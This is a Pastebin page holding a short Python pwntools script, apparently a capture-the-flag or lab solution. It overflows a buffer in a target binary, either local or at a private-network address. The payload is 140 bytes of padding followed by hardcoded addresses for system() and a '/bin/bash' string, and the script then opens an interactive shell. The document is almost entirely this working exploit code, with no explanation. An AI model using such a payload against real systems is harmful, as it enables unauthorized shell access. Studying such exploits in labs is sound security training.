Advertisement
foryou97

ex_rop2.py

Oct 5th, 2017
100
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.49 KB | None | 0 0
  1. from pwn import *
  2. from termcolor import colored, cprint
  3. import random
  4. import sys
  5.  
  6. if len(sys.argv)>1:
  7.     # python guessing.py guessing
  8.     r = process(sys.argv[1])
  9.     print colored("attach %d\n" % r.pid,"yellow")
  10.     raw_input("debug?")
  11. else:
  12.     HOST = '192.168.137.40'
  13.     PORT = 1237
  14.     r = remote(HOST,PORT)
  15.  
  16.  
  17.  
  18. system = 0x80483a0
  19. bin_bash = 0x8048610
  20.  
  21. payload = 'A' * 140
  22. payload += p32(system)
  23. payload += 'A'*4 # exit()
  24. payload += p32(bin_bash)
  25.  
  26. r.sendline(payload)
  27. r.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement